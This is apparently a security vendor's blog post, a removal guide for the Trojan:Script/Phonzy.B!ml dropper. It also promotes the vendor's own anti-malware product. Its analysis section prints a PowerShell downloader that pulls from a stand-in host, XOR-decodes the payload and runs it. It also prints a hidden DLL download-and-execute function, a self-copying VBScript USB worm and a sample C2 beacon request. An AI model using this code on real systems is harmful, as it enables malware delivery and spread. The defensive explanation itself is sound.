{"id":19960,"date":"2024-02-27T08:45:57","date_gmt":"2024-02-27T08:45:57","guid":{"rendered":"https:\/\/gridinsoft.com\/blogs\/?p=19960"},"modified":"2025-04-09T22:48:22","modified_gmt":"2025-04-09T22:48:22","slug":"trojanscript-phonzy-removal-guide","status":"publish","type":"post","link":"https:\/\/gridinsoft.com\/blogs\/trojanscript-phonzy-removal-guide\/","title":{"rendered":"How to Remove Trojan:Script\/Phonzy.B!ml Malware"},"content":{"rendered":"\r\n<p><strong>Trojan:Script\/Phonzy.B!ml<\/strong> is a generic detection name used by Microsoft Defender for a dangerous loader malware. This threat primarily functions as a dropper, downloading and executing additional malicious payloads onto infected systems. In numerous documented infection cases, Phonzy trojan has been observed delivering banking trojans designed to steal financial credentials.<\/p>\r\n\r\n\r\n\r\n<div itemscope itemtype=\"https:\/\/schema.org\/TechArticle\">\r\n  <meta itemprop=\"headline\" content=\"Trojan:Script\/Phonzy.B!ml Removal Guide\" \/>\r\n  <meta itemprop=\"description\" content=\"Comprehensive guide on how to detect and remove Trojan:Script\/Phonzy.B!ml malware, a dangerous dropper that delivers banking trojans and other malicious payloads.\" \/>\r\n  <meta itemprop=\"keywords\" content=\"Trojan:Script\/Phonzy.B!ml, malware removal, dropper trojan, Microsoft Defender detection, banking trojans\" \/>\r\n<\/div>\r\n\r\n\r\n\r\n<table class=\"malware-info-table\">\r\n  <tr>\r\n    <th>Attribute<\/th>\r\n    <th>Details<\/th>\r\n  <\/tr>\r\n  <tr>\r\n    <td>Threat Name<\/td>\r\n    <td>Trojan:Script\/Phonzy.B!ml<\/td>\r\n  <\/tr>\r\n  <tr>\r\n    <td>Type<\/td>\r\n    <td>Dropper, Loader, Trojan<\/td>\r\n  <\/tr>\r\n  <tr>\r\n    <td>Detection Method<\/td>\r\n    <td>Machine Learning (ML) by Microsoft Defender<\/td>\r\n  <\/tr>\r\n  <tr>\r\n    <td>Primary Functions<\/td>\r\n    <td>Downloading additional malware, system reconnaissance, data theft<\/td>\r\n  <\/tr>\r\n  <tr>\r\n    <td>Propagation<\/td>\r\n    <td>Phishing emails, malicious websites, cracked software, USB drives<\/td>\r\n  <\/tr>\r\n  <tr>\r\n    <td>Risks<\/td>\r\n    <td>Banking trojan infection, credential theft, complete system compromise<\/td>\r\n  <\/tr>\r\n  <tr>\r\n    <td>Removal Difficulty<\/td>\r\n    <td>Moderate to High (anti-malware tool recommended)<\/td>\r\n  <\/tr>\r\n<\/table>\r\n\r\n\r\n\r\n<h2 class=\"wp-block-heading\">Trojan:Script\/Phonzy.B!ml Overview<\/h2>\r\n\r\n\r\n\r\n<p>Trojan:Script\/Phonzy.B!ml is <a href=\"https:\/\/answers.microsoft.com\/en-us\/windows\/forum\/all\/windows-defender-detected-trojanwin32phonzyaml\/299db484-8073-4e35-b32f-a16fd3060e34\" rel=\"noopener noreferrer nofollow\" target=\"_blank\">a generic detection name<\/a> that Microsoft Windows Defender uses to identify a family of similar malware threats. While these malicious programs may share behavioral patterns and code characteristics, they often belong to different malware families, making complete identification challenging through automated detection alone.<\/p>\r\n\r\n\r\n\r\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/02\/phonzy-bml-defender.webp\" alt=\"Microsoft Defender alert showing Trojan:Script\/Phonzy.B!ml detection with severe threat level\" width=\"579\" height=\"749\" class=\"aligncenter size-full wp-image-20045\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/02\/phonzy-bml-defender.webp 579w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/02\/phonzy-bml-defender-232x300.webp 232w\" sizes=\"auto, (max-width: 579px) 100vw, 579px\" \/>\r\n\r\n\r\n\r\n<p>Functionally, Phonzy.B!ml <a href=\"https:\/\/gridinsoft.com\/dropper\">operates as a scripted dropper malware<\/a>. Its primary purpose is <strong>to download and execute additional malicious payloads<\/strong> without requiring user interaction. Beyond this core function, Phonzy samples are designed to collect <strong>extensive information about the infected system<\/strong>, including geographical location, operating system details, installed applications, and hardware specifications. The typical payload delivered in Phonzy malware attacks <a href=\"https:\/\/gridinsoft.com\/blogs\/qakbot-is-back\/\">consists of sophisticated banking trojans<\/a> \u2013 specialized credential stealers that target online banking information, financial credentials, and digital payment data.<\/p>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">Is Phonzy B!ml a False Positive?<\/h3>\r\n\r\n\r\n\r\n<p>Looking deeper at Microsoft&#8217;s detection naming conventions reveals that <strong>the &#8220;!ml&#8221; suffix stands for &#8220;machine learning&#8221;<\/strong>, indicating that the threat was identified by Microsoft&#8217;s artificial intelligence detection engine. While highly effective, machine learning detection sometimes requires confirmation through traditional signature-based systems. Without this secondary verification, the possibility of <strong>false positive detections increases significantly<\/strong>.<\/p>\r\n\r\n\r\n\r\n<p>Unfortunately, reliably distinguishing between legitimate false positives and actual Phonzy infections can be challenging. Modern malware employs sophisticated obfuscation techniques to blend seamlessly with legitimate system files, making file location alone insufficient for identification. For this reason, <strong>we strongly recommend scanning your system with GridinSoft Anti-Malware<\/strong> to obtain a definitive analysis and ensure complete removal of any threats.<\/p>\r\n\r\n\r\n\r\n<h2 class=\"wp-block-heading\">Phonzy.B!ml Technical Analysis<\/h2>\r\n\r\n\r\n\r\n<p>Since Phonzy is a generic detection name covering multiple malware variants, identifying a single representative sample for analysis presents challenges. To provide a comprehensive understanding of this threat, we&#8217;ve analyzed several specimens to document the full range of capabilities. In summary, while Phonzy appears to be a relatively simple dropper on the surface, it can cause extensive damage to infected systems through the secondary malware it deploys.<\/p>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">Infection Vector and Launch Mechanism<\/h3>\r\n\r\n\r\n\r\n<p>The majority of Phonzy samples we&#8217;ve encountered arrive <strong>in an obfuscated, packed form<\/strong> \u2013 typically encrypted and\/or archived. This packaging serves two primary purposes: evading static detection mechanisms and complicating forensic analysis. In the case of Phonzy variants, evading detection appears to be the primary motivation.<\/p>\r\n\r\n\r\n\r\n<figure id=\"attachment_19989\" aria-describedby=\"caption-attachment-19989\" style=\"width: 790px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/02\/phonzy-unpacking.webp\" alt=\"Malware unpacking process showing obfuscated script execution and payload extraction\" width=\"790\" height=\"470\" class=\"size-full wp-image-19989\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/02\/phonzy-unpacking.webp 790w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/02\/phonzy-unpacking-300x178.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/02\/phonzy-unpacking-768x457.webp 768w\" sizes=\"auto, (max-width: 790px) 100vw, 790px\" \/><figcaption id=\"caption-attachment-19989\" class=\"wp-caption-text\">Process monitoring showing Phonzy malware unpacking and launching payload<\/figcaption><\/figure>\r\n\r\n\r\n\r\n<p>To execute the unpacking process, Phonzy relies on the initial script that downloads the malware to the target system. This is typically a PowerShell script that retrieves the dropper from an intermediary command and control (C2) server. Below is an example of a typical obfuscated PowerShell script used in Phonzy distribution:<\/p>\r\n\r\n\r\n<pre class=\"brush: powershell; title: ; notranslate\" title=\"\">\r\n$e3Df = &#x5B;System.IO.Path]::GetTempPath();\r\n$k9jL = &quot;$e3Df\\t8R4.exe&quot;;\r\n$w32c = New-Object System.Net.WebClient;\r\n$w32c.Headers.Add(&quot;User-Agent&quot;, &quot;Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36&quot;);\r\ntry {\r\n    $w32c.DownloadFile(&quot;hxxp:\/\/malicious-server.com\/payload.bin&quot;, $k9jL);\r\n    $b9Te = &#x5B;System.IO.File]::ReadAllBytes($k9jL);\r\n    for($i=0; $i -lt $b9Te.length; $i++) {\r\n        $b9Te&#x5B;$i] = $b9Te&#x5B;$i] -bxor 0x43;\r\n    }\r\n    &#x5B;System.IO.File]::WriteAllBytes($k9jL, $b9Te);\r\n    Start-Process $k9jL;\r\n} catch {\r\n    Remove-Item $k9jL -ErrorAction SilentlyContinue;\r\n}\r\n<\/pre>\r\n\r\n\r\n<p>The script above demonstrates how Phonzy is downloaded, decrypted with a simple XOR operation, and then executed on the target system. In a real attack, this script would be significantly more obfuscated to avoid detection.<\/p>\r\n\r\n\r\n\r\n<p>We recently documented a sophisticated campaign that bypasses traditional infection steps by tricking users into running malicious PowerShell scripts directly. <a href=\"https:\/\/gridinsoft.com\/blogs\/fake-captcha-sites-malicious-code-lumma-stealer\/\">While that campaign delivered Lumma Stealer<\/a>, the same infrastructure and techniques could easily be adapted to distribute Phonzy variants or any other malware family.<\/p>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">System Reconnaissance<\/h3>\r\n\r\n\r\n\r\n<p>Once successfully executed, Trojan:Script\/Phonzy.B!ml begins collecting <strong>comprehensive information about the compromised system<\/strong>. This reconnaissance phase typically includes gathering details about:<\/p>\r\n\r\n\r\n\r\n<ul class=\"wp-block-list\"><li>Operating system version and architecture<\/li><li>Hardware specifications (CPU, RAM, disk space)<\/li><li>Installed applications and security software<\/li><li>Connected devices and peripherals<\/li><li>Geographic location based on IP address<\/li><li>User account information and privileges<\/li><li>Browser data and saved credentials<\/li><\/ul>\r\n\r\n\r\n\r\n<p>This information is used to create a unique fingerprint of the infected system, allowing attackers to track individual infections and potentially tailor subsequent payloads accordingly. Some advanced Phonzy.B!ml variants also include functionality <strong>to capture screenshots<\/strong> of the victim&#8217;s desktop, providing attackers with visual information about the compromised environment.<\/p>\r\n\r\n\r\n\r\n<figure id=\"attachment_19993\" aria-describedby=\"caption-attachment-19993\" style=\"width: 671px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/02\/sysinfo-log.webp\" alt=\"Text log showing system information collected by Phonzy malware including OS version, hardware details, and installed software\" width=\"671\" height=\"426\" class=\"size-full wp-image-19993\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/02\/sysinfo-log.webp 671w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/02\/sysinfo-log-300x190.webp 300w\" sizes=\"auto, (max-width: 671px) 100vw, 671px\" \/><figcaption id=\"caption-attachment-19993\" class=\"wp-caption-text\">System information log collected by a Phonzy sample during reconnaissance phase<\/figcaption><\/figure>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">Command and Control Communication<\/h3>\r\n\r\n\r\n\r\n<p>Following the reconnaissance phase, Phonzy establishes communication with its command and control infrastructure. The malware <strong>sends an HTTP POST request to the C2 server<\/strong>, notifying the attackers of the new infection and transmitting the collected system information. Depending on the response received from the server, the malware may:<\/p>\r\n\r\n\r\n\r\n<ul class=\"wp-block-list\"><li>Remain dormant to avoid detection<\/li><li>Download additional malware payloads<\/li><li>Execute specific commands on the infected system<\/li><li>Uninstall itself if the target is deemed unsuitable<\/li><\/ul>\r\n\r\n\r\n\r\n<p>While the C2 communication protocols employed by Phonzy variants are relatively simplistic, they are designed to blend in with normal web traffic to avoid detection by network monitoring solutions. Below is an example of a typical HTTP request pattern used by Phonzy:<\/p>\r\n\r\n\r\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nPOST \/gate.php HTTP\/1.1\r\nHost: malicious-server.com\r\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36\r\nContent-Type: application\/x-www-form-urlencoded\r\nContent-Length: 2048\r\n\r\nid=MACHINE_ID&amp;os=Windows+10+Pro&amp;arch=x64&amp;av=Windows+Defender&amp;installed=Chrome,Office,Adobe&amp;admin=true&amp;version=1.2\r\n<\/pre>\r\n\r\n\r\n<h3 class=\"wp-block-heading\">Secondary Payload Delivery<\/h3>\r\n\r\n\r\n\r\n<p>The primary function of Phonzy Trojan is downloading and executing secondary malware payloads. Upon receiving instructions from the C2 server, Phonzy will download additional malware from specified URLs, typically compromised websites used as intermediary distribution points to obscure the actual source of the malicious code.<\/p>\r\n\r\n\r\n\r\n<p>For executing secondary payloads, Phonzy employs several techniques depending on the payload type:<\/p>\r\n\r\n\r\n\r\n<ul class=\"wp-block-list\"><li><strong>Executable Files (.exe):<\/strong> Direct execution through process creation<\/li><li><strong>Dynamic Link Libraries (.dll):<\/strong> Loaded through DLL hijacking or injection into legitimate processes<\/li><li><strong>Script Files (.ps1, .vbs, .js):<\/strong> Executed through appropriate scripting engines<\/li><li><strong>Document Files (.doc, .xls):<\/strong> Opened with legitimate applications to trigger embedded macros<\/li><\/ul>\r\n\r\n\r\n\r\n<p>The following PowerShell code demonstrates how Phonzy might execute a downloaded DLL payload through rundll32:<\/p>\r\n\r\n\r\n<pre class=\"brush: powershell; title: ; notranslate\" title=\"\">\r\n# Function to download and execute DLL payload\r\nfunction Invoke-DllPayload {\r\n    param(\r\n        &#x5B;string]$PayloadUrl,\r\n        &#x5B;string]$EntryPoint\r\n    )\r\n    \r\n    $TempPath = &#x5B;System.IO.Path]::GetTempPath()\r\n    $PayloadPath = Join-Path $TempPath (&#x5B;System.Guid]::NewGuid().ToString() + &quot;.dll&quot;)\r\n    \r\n    try {\r\n        # Download the DLL\r\n        (New-Object System.Net.WebClient).DownloadFile($PayloadUrl, $PayloadPath)\r\n        \r\n        # Execute the DLL using rundll32\r\n        $Command = &quot;rundll32.exe $PayloadPath,$EntryPoint&quot;\r\n        Start-Process -FilePath &quot;cmd.exe&quot; -ArgumentList &quot;\/c $Command&quot; -WindowStyle Hidden\r\n        \r\n        return $true\r\n    }\r\n    catch {\r\n        return $false\r\n    }\r\n}\r\n\r\n# Call the function with parameters from C2 server\r\nInvoke-DllPayload -PayloadUrl &quot;hxxp:\/\/compromised-site.com\/payload.dll&quot; -EntryPoint &quot;DllMain&quot;\r\n<\/pre>\r\n\r\n\r\n<h3 class=\"wp-block-heading\">USB Drive Propagation<\/h3>\r\n\r\n\r\n\r\n<p>Some advanced variants of Phonzy.B!ml include self-propagation capabilities, allowing the malware to spread via attached USB drives and other removable storage media. This worm-like behavior is relatively uncommon in modern malware, as security vendors have developed robust detection methods for such propagation techniques. However, this approach remains effective in certain environments, particularly those with limited security measures or air-gapped networks.<\/p>\r\n\r\n\r\n\r\n<p>The USB infection mechanism typically works by:<\/p>\r\n\r\n\r\n\r\n<ol class=\"wp-block-list\"><li>Monitoring for newly connected USB storage devices<\/li><li>Creating hidden folders on the device to store malware payloads<\/li><li>Modifying or creating autorun.inf files to trigger execution when connected to a new system<\/li><li>Converting legitimate executables on the drive into infected versions<\/li><li>Creating shortcut files that execute malware while opening legitimate content<\/li><\/ol>\r\n\r\n\r\n\r\n<p>The following is a simplified example of code that might be used by Phonzy to monitor for and infect USB drives:<\/p>\r\n\r\n\r\n<pre class=\"brush: vb; title: ; notranslate\" title=\"\">\r\n&#039; VBScript example of USB drive infection mechanism\r\nOption Explicit\r\n\r\nDim fso, wsh, drives, drive\r\nSet fso = CreateObject(&quot;Scripting.FileSystemObject&quot;)\r\nSet wsh = CreateObject(&quot;WScript.Shell&quot;)\r\n\r\n&#039; Monitor for new drives\r\nSub MonitorDrives()\r\n    On Error Resume Next\r\n    \r\n    &#039; Get current drives\r\n    Set drives = fso.Drives\r\n    \r\n    &#039; Check each drive\r\n    For Each drive in drives\r\n        &#039; Look for removable drives\r\n        If drive.DriveType = 1 And drive.IsReady Then\r\n            InfectDrive drive.Path\r\n        End If\r\n    Next\r\n    \r\n    &#039; Continue monitoring\r\n    WScript.Sleep 5000\r\n    MonitorDrives\r\nEnd Sub\r\n\r\n&#039; Infect a specific drive\r\nSub InfectDrive(drivePath)\r\n    On Error Resume Next\r\n    \r\n    &#039; Create hidden folder\r\n    fso.CreateFolder drivePath &amp; &quot;\\System Volume Information&quot;\r\n    wsh.Run &quot;attrib +h +s &quot;&quot;&quot; &amp; drivePath &amp; &quot;\\System Volume Information&quot;&quot;&quot;, 0, True\r\n    \r\n    &#039; Copy malware payload\r\n    fso.CopyFile WScript.ScriptFullName, drivePath &amp; &quot;\\System Volume Information\\svchost.exe&quot;\r\n    \r\n    &#039; Create autorun.inf\r\n    Dim autorun\r\n    Set autorun = fso.CreateTextFile(drivePath &amp; &quot;\\autorun.inf&quot;, True)\r\n    autorun.WriteLine &quot;&#x5B;AutoRun]&quot;\r\n    autorun.WriteLine &quot;open=System Volume Information\\svchost.exe&quot;\r\n    autorun.WriteLine &quot;action=Open files on this drive&quot;\r\n    autorun.Close\r\n    \r\n    &#039; Hide autorun.inf\r\n    wsh.Run &quot;attrib +h +s &quot;&quot;&quot; &amp; drivePath &amp; &quot;\\autorun.inf&quot;&quot;&quot;, 0, True\r\n    \r\n    &#039; Create shortcuts to legitimate files\r\n    CreateMaliciousShortcuts drivePath\r\nEnd Sub\r\n\r\n&#039; Create malicious shortcuts to existing files\r\nSub CreateMaliciousShortcuts(drivePath)\r\n    &#039; Implementation details omitted for brevity\r\nEnd Sub\r\n\r\n&#039; Start monitoring\r\nMonitorDrives\r\n<\/pre>\r\n\r\n\r\n<h2 class=\"wp-block-heading\">How To Remove Trojan:Script\/Phonzy.B!ml<\/h2>\r\n\r\n\r\n\r\n<p>Removing Phonzy B!ml malware requires a thorough approach due to its ability to download multiple malicious payloads and establish persistence mechanisms. We strongly recommend using GridinSoft Anti-Malware, which is specifically designed to detect and eliminate complex malware threats including all components and payloads associated with Phonzy infections.<\/p>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">Automated Removal with GridinSoft Anti-Malware<\/h3>\r\n\r\n\r\n\r\n<p>Follow these steps to completely remove Trojan:Script\/Phonzy.B!ml and any associated malware from your system:<\/p>\r\n\r\n\r\n\r\n<h4 class=\"wp-block-heading\">Step 1: Download and Install GridinSoft Anti-Malware<\/h4>\r\n\r\n\r\n\r\n<p>Download GridinSoft Anti-Malware using the button below. Before starting the installation, disconnect from the internet and close all browser windows to prevent any potential interference from active malware.<\/p>\r\n\r\n\r\n\r\n<div class=\"wp-block-buttons is-layout-flex wp-block-buttons-is-layout-flex\">\r\n\r\n<div class=\"wp-block-button aligncenter\"><a class=\"wp-block-button__link\" href=\"https:\/\/gridinsoft.com\/download\/antimalware\">Download GridinSoft Anti-Malware<\/a><\/div>\r\n\r\n<\/div>\r\n\r\n\r\n\r\n<h4 class=\"wp-block-heading\">Step 2: Run a Full System Scan<\/h4>\r\n\r\n\r\n\r\n<p>Launch GridinSoft Anti-Malware and select the &#8220;Full Scan&#8221; option to conduct a comprehensive examination of your entire system. This will detect Phonzy.B!ml and any other malware that may have been downloaded as secondary payloads.<\/p>\r\n\r\n\r\n\r\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main.webp\" alt=\"GridinSoft Anti-Malware scan interface showing scan options and progress\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-22665\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main.webp 886w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main-300x233.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main-768x597.webp 768w\" sizes=\"auto, (max-width: 886px) 100vw, 886px\" \/>\r\n\r\n\r\n\r\n<h4 class=\"wp-block-heading\">Step 3: Remove All Detected Threats<\/h4>\r\n\r\n\r\n\r\n<p>After the scan completes, review the list of detected threats. Select all items and click &#8220;Clean Now&#8221; to remove Phonzy.B!ml and all associated malware components from your system.<\/p>\r\n\r\n\r\n\r\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result.webp\" alt=\"GridinSoft Anti-Malware detection results showing Phonzy malware components with Clean Now button\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-22666\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result.webp 886w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result-300x233.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result-768x597.webp 768w\" sizes=\"auto, (max-width: 886px) 100vw, 886px\" \/>\r\n\r\n\r\n\r\n<h4 class=\"wp-block-heading\">Step 4: Reset Your Browsers<\/h4>\r\n\r\n\r\n\r\n<p>Since banking trojans commonly delivered by Phonzy target browser data, it&#8217;s essential to reset all installed browsers to remove any malicious extensions, hijacked settings, or injected code:<\/p>\r\n\r\n\r\n\r\n<ol class=\"wp-block-list\"><li>In GridinSoft Anti-Malware, navigate to the &#8220;Tools&#8221; tab<\/li><li>Select &#8220;Reset Browser Settings&#8221;<\/li><li>Choose all browsers installed on your system<\/li><li>Click &#8220;Reset&#8221; to restore browsers to their default state<\/li><\/ol>\r\n\r\n\r\n\r\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2022\/07\/am-reset-browser.png\" alt=\"GridinSoft Anti-Malware browser reset tool interface showing browser selection options\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-18654\" title=\"\">\r\n\r\n\r\n\r\n<h4 class=\"wp-block-heading\">Step 5: Scan Removable Devices<\/h4>\r\n\r\n\r\n\r\n<p>Since some Phonzy variants can spread via USB drives, scan all removable storage devices that have been connected to your computer:<\/p>\r\n\r\n\r\n\r\n<ol class=\"wp-block-list\"><li>Connect each USB drive or external storage device one at a time<\/li><li>In GridinSoft Anti-Malware, select &#8220;Custom Scan&#8221;<\/li><li>Choose the connected removable drive<\/li><li>Complete a full scan and remove any detected threats<\/li><\/ol>\r\n\r\n\r\n\r\n<h4 class=\"wp-block-heading\">Step 6: Enable Proactive Protection<\/h4>\r\n\r\n\r\n\r\n<p>To prevent future infections, enable GridinSoft Anti-Malware&#8217;s proactive protection features:<\/p>\r\n\r\n\r\n\r\n<ol class=\"wp-block-list\"><li>Navigate to the &#8220;Protect&#8221; tab<\/li><li>Enable &#8220;Real-Time Protection&#8221; to guard against future threats<\/li><li>Enable &#8220;Removable Device Protection&#8221; to prevent USB-based infections<\/li><li>Click &#8220;Apply&#8221; to save your protection settings<\/li><\/ol>\r\n\r\n\r\n\r\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean.webp\" alt=\"GridinSoft Anti-Malware protection settings panel showing security options enabled\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-22667\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean.webp 886w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean-300x233.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean-768x597.webp 768w\" sizes=\"auto, (max-width: 886px) 100vw, 886px\" \/>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">Manual Removal Instructions for Advanced Users<\/h3>\r\n\r\n\r\n\r\n<p>While automated removal is strongly recommended, technically proficient users may attempt manual removal. Be aware that this approach requires advanced system knowledge and carries risks if performed incorrectly.<\/p>\r\n\r\n\r\n\r\n<h4 class=\"wp-block-heading\">Step 1: Boot into Safe Mode<\/h4>\r\n\r\n\r\n\r\n<ol class=\"wp-block-list\"><li>Press Win + R, type &#8220;msconfig&#8221; and press Enter<\/li><li>Go to the &#8220;Boot&#8221; tab<\/li><li>Check &#8220;Safe boot&#8221; and select &#8220;Minimal&#8221;<\/li><li>Click &#8220;Apply&#8221; and &#8220;OK&#8221;<\/li><li>Restart your computer when prompted<\/li><\/ol>\r\n\r\n\r\n\r\n<h4 class=\"wp-block-heading\">Step 2: Stop Malicious Processes<\/h4>\r\n\r\n\r\n\r\n<ol class=\"wp-block-list\"><li>Press Ctrl + Shift + Esc to open Task Manager<\/li><li>Look for suspicious processes (random names, system locations, high resource usage)<\/li><li>Right-click suspicious processes and select &#8220;End Task&#8221;<\/li><li>For persistent processes, note their location for later removal<\/li><\/ol>\r\n\r\n\r\n\r\n<h4 class=\"wp-block-heading\">Step 3: Remove Malicious Files<\/h4>\r\n\r\n\r\n\r\n<p>Common Phonzy file locations include:<\/p>\r\n\r\n\r\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nC:\\Users\\&#x5B;Username]\\AppData\\Roaming\\&#x5B;random name].exe\r\nC:\\Users\\&#x5B;Username]\\AppData\\Local\\Temp\\&#x5B;random name].exe\r\nC:\\Windows\\Temp\\&#x5B;random name].dll\r\nC:\\ProgramData\\&#x5B;random name]\\&#x5B;random name].exe\r\n<\/pre>\r\n\r\n\r\n<h4 class=\"wp-block-heading\">Step 4: Remove Registry Entries<\/h4>\r\n\r\n\r\n\r\n<p>Press Win + R, type &#8220;regedit&#8221; and press Enter. Look for and delete these registry entries:<\/p>\r\n\r\n\r\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\&#x5B;random name]\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\&#x5B;random name]\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run\\&#x5B;random name]\r\n<\/pre>\r\n\r\n\r\n<h4 class=\"wp-block-heading\">Step 5: Disable Malicious Scheduled Tasks<\/h4>\r\n\r\n\r\n\r\n<ol class=\"wp-block-list\"><li>Press Win + R, type &#8220;taskschd.msc&#8221; and press Enter<\/li><li>Look for tasks with random names or suspicious actions<\/li><li>Right-click suspicious tasks and select &#8220;Delete&#8221;<\/li><\/ol>\r\n\r\n\r\n\r\n<h2 class=\"wp-block-heading\">Prevention Recommendations<\/h2>\r\n\r\n\r\n\r\n<p>To protect your system from Trojan:Script\/Phonzy.B!ml and similar threats, implement these security best practices:<\/p>\r\n\r\n\r\n\r\n<ul class=\"wp-block-list\"><li><strong>Avoid pirated software and unauthorized downloads<\/strong> &#8211; Cracked software is frequently used to distribute malware like Phonzy<\/li><li><strong>Be cautious with email attachments<\/strong> &#8211; Never open attachments from unknown senders or unexpected messages<\/li><li><strong>Keep systems and software updated<\/strong> &#8211; Install security updates promptly to patch vulnerabilities<\/li><li><strong>Use advanced security software<\/strong> &#8211; GridinSoft Anti-Malware provides proactive protection against emerging threats<\/li><li><strong>Enable USB drive protection<\/strong> &#8211; Utilize security features that scan removable media before accessing its contents<\/li><li><strong>Be wary of fake download sites<\/strong> &#8211; Verify website legitimacy before downloading any software<\/li><li><strong>Implement regular backups<\/strong> &#8211; Maintain current backups of important data to minimize impact of potential infections<\/li><\/ul>\r\n\r\n\r\n\r\n<p>GridinSoft Anti-Malware&#8217;s Removable Device Protection feature is particularly effective at blocking attempts by Phonzy and other malware to infect systems via USB drives, providing an essential layer of protection against this specific infection vector.<\/p>\r\n\r\n\r\n\r\n<h2 class=\"wp-block-heading\">Frequently Asked Questions<\/h2>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">How does Trojan:Script\/Phonzy.B!ml infect systems?<\/h3>\r\n\r\n\r\n\r\n<p>Trojan:Script\/Phonzy.B!ml typically infects systems through several methods, including phishing emails with malicious attachments, drive-by downloads from compromised websites, bundled software installations (especially cracked or pirated software), and infected USB drives. The initial infection usually involves a PowerShell or other script that downloads and executes the main Phonzy payload, which then contacts its command and control server for further instructions and additional malware downloads.<\/p>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">What damage can Phonzy.B!ml cause to my computer?<\/h3>\r\n\r\n\r\n\r\n<p>While Phonzy.B!ml itself primarily functions as a dropper, the secondary payloads it delivers can cause extensive damage. Banking trojans commonly delivered by Phonzy can steal financial credentials, leading to unauthorized transactions and identity theft. Other potential payloads include ransomware that encrypts your files, cryptominers that consume system resources, and backdoors that provide attackers with persistent access to your system. Additionally, the system reconnaissance performed by Phonzy compromises your privacy by collecting and transmitting sensitive information about your computer and browsing habits.<\/p>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">Why does Microsoft Defender label this threat with &#8216;!ml&#8217; in its name?<\/h3>\r\n\r\n\r\n\r\n<p>The &#8216;!ml&#8217; suffix in Microsoft Defender detection names indicates that the threat was identified using machine learning algorithms rather than traditional signature-based detection. This approach allows Microsoft to detect previously unseen malware variants based on behavioral similarities to known threats. While machine learning detection provides excellent protection against emerging threats, it occasionally results in false positives. When you see the &#8216;!ml&#8217; designation, it&#8217;s advisable to verify the detection using a specialized anti-malware tool like GridinSoft Anti-Malware, which employs multiple detection techniques to provide more definitive results.<\/p>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">Can Phonzy.B!ml steal my banking credentials?<\/h3>\r\n\r\n\r\n\r\n<p>Phonzy.B!ml itself doesn&#8217;t directly steal banking credentials, but it frequently downloads and installs banking trojans specifically designed for this purpose. These secondary payloads employ various techniques to capture financial information, including keylogging (recording keystrokes), form grabbing (capturing data entered into web forms), screen capturing during banking sessions, and web injection (inserting malicious code into banking websites to harvest credentials). To protect your financial information after a Phonzy infection, you should completely remove all malware, reset your browsers, change passwords for all financial accounts using a clean device, and monitor your accounts for unauthorized 